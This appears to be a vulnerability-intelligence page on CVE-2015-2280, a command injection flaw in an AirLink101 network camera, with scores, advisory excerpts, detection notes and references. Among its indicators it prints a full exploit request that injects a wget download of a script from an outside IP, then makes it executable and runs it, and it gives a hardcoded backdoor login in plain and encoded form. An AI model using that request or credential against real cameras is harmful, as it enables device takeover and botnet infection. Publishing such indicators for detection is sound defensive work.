CVE-2015-2280
published 2017-07-25CVE-2015-2280: snwrite.cgi in AirLink101 SkyIPCam1620W Wireless N MPEG4 3GPP network camera with firmware FW_AIC1620W_1.1.0-12_20120709_r1192.pck allows remote authenticated…
PriorityP180high8.8CVSS 3.0
AVNACLPRLUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
16.99%
96.7th percentile
snwrite.cgi in AirLink101 SkyIPCam1620W Wireless N MPEG4 3GPP network camera with firmware FW_AIC1620W_1.1.0-12_20120709_r1192.pck allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the mac parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| airlink101 | skyipcam1620w_wireless_n_mpeg4_3gpp_firmware | — | — |
Detection & IOCsextracted from sources · hover to see the quote
url/maker/snwrite.cgi?mac=1234;wget%20 http:// 89.46.223.70/airlink[.]sh %20-O%20/tmp/666trapgod;chmod%20777%20/tmp/666trapgod;./tmp/666trapgod↗
- →RIFT botnet ELF payloads are packed with UPX packer. Use UPX signature detection on binaries dropped to /tmp/. ↗
- →The backdoor credential 'productmaker:ftvsbannedcode' (base64: cHJvZHVjdG1ha2VyOmZ0dnNiYW5uZWRjb2Rl) grants access to /maker/snwrite.cgi. Alert on HTTP Basic Auth using this credential or the encoded string. ↗
- →The vulnerable firmware version is FW_AIC1620W_1.1.0-12_20120709_r1192.pck. Inventory devices running this firmware version for prioritized patching and monitoring. ↗
- ·Exploitation of CVE-2015-2280 requires valid credentials; however, hardcoded backdoor credentials ('productmaker:ftvsbannedcode') present in /server/usr.ini effectively make this unauthenticated in practice. ↗
- ·Other devices based on the same firmware as the AirLink101 SkyIPCam1620W are likely affected but were not tested by the researcher. ↗
CVSS provenance
nvdv3.08.8HIGHCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
vulncheck8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-9xpp-pm7c-3qwm: snwrite
ghsa_unreviewed·2022-05-14
CVE-2015-2280 [HIGH] CWE-78 GHSA-9xpp-pm7c-3qwm: snwrite
snwrite.cgi in AirLink101 SkyIPCam1620W Wireless N MPEG4 3GPP network camera with firmware FW_AIC1620W_1.1.0-12_20120709_r1192.pck allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the mac parameter.
VulnCheck
airlink101 skyipcam1620w_wireless_n_mpeg4_3gpp_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2015·CVSS 8.8
CVE-2015-2280 [HIGH] airlink101 skyipcam1620w_wireless_n_mpeg4_3gpp_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
airlink101 skyipcam1620w_wireless_n_mpeg4_3gpp_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
snwrite.cgi in AirLink101 SkyIPCam1620W Wireless N MPEG4 3GPP network camera with firmware FW_AIC1620W_1.1.0-12_20120709_r1192.pck allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the mac parameter.
Affected: airlink101 skyipcam1620w_wireless_n_mpeg4_3gpp_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://app.crowdsec.net/cti/cve-explorer/CVE-2015-2280; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-10-19&host_type=s
No detection rules found.
Zscaler
A Sneak Peek into Recent IoT Attacks | Zscaler Blog
blogs_zscaler·2019-01-28
A Sneak Peek into Recent IoT Attacks | Zscaler Blog
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Greynoiseio
NoiseLetter June 2025
blogs_greynoiseio
NoiseLetter June 2025
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
http://packetstormsecurity.com/files/132609/AirLink101-SkyIPCam1620W-OS-Command-Injection.htmlhttp://seclists.org/fulldisclosure/2015/Jul/40http://www.securityfocus.com/archive/1/535963/100/0/threadedhttp://www.securityfocus.com/bid/75597https://www.coresecurity.com/advisories/airlink101-skyipcam1620w-os-command-injectionhttps://www.exploit-db.com/exploits/37527/http://packetstormsecurity.com/files/132609/AirLink101-SkyIPCam1620W-OS-Command-Injection.htmlhttp://seclists.org/fulldisclosure/2015/Jul/40http://www.securityfocus.com/archive/1/535963/100/0/threadedhttp://www.securityfocus.com/bid/75597https://www.coresecurity.com/advisories/airlink101-skyipcam1620w-os-command-injectionhttps://www.exploit-db.com/exploits/37527/
2017-07-25
Published
Exploited in the wild